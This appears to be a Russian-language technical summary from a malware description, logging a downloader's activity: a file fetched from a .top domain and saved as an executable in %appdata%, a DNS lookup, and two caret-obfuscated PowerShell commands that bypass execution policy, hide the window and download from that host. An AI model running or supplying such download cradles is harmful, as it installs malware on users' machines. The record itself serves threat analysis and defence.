Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWer^S^hel^L.^eXE -^e^X^Ec^U^T^Io^NpOL^iC^y B^ypa^Ss -^n^oP^RofIl^E -^wiNdoWStYlE ^HiDdEN (n^Ew-^Ob^jeCt SyS^TE^m^.N^Et.^we^BCLi^ENT).^D^OWnlOaDf^I^l^E^('http://sutraponef.t...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "p^oWer^S^hel^L.^eXE -^e^X^Ec^U^T^Io^NpOL^iC^y B^ypa^Ss -^n^oP^RofIl^E -^wiNdoWStYlE ^HiDdEN (n^Ew-^Ob^jeCt SyS^TE^m^.N^Et.^we^BCLi^ENT).^D^OWnlOaDf^I^l^E^('http://sutraponef.t...' (со скрытым окном)